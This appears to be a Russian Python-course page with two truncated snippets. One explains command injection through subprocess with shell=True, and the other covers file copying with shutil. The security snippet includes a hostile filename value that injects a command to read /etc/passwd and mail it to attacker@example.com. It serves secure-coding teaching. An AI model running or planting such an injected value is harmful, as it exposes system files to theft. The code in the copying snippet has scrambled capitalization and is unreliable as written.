Python - Полный Курс для Начинающих
Уязвимости и безопасность в Python: разбор критических ошибок и стратегии защиты
Использование subprocess.call, os.system или popen с невалидируемым пользовательским вводом — частая ошибка. Пример: python Copy Download import subprocess
def transcode_file(filename):
command = f'ffmpeg -i "{filename}" output.mpg' # Уязвимость!
subprocess.call(command, shell=True) # Параметр shell=True опасен Угроза: Злоумышленник может передать filename вида "; cat /etc/passwd | mail attacker@example.com, выполнив произвольные команды. Решение: python Copy Download subprocess.call(['ffmpeg', '-i', shlex...
Копирование файла python
В Python существует несколько способов скопировать файл, каждый из которых имеет свои особенности и подходит для разных сценариев. Вот основные методы с примерами и пояснениями: 1. Shutil. copy(source, destination): Описание: Этот метод копирует Только содержимое файла и права доступа (permissions). Метаданные файла, такие как время последнего изменения, не сохраняются. Import shutil Source_file = "source. txt" Destination_file = "destination. txt" Shutil. copy(source_file, destination_file) Print(f"Файл {source_file} скопирован в {destination_file}") 2. Shutil. copy2(source, destination): Описание:...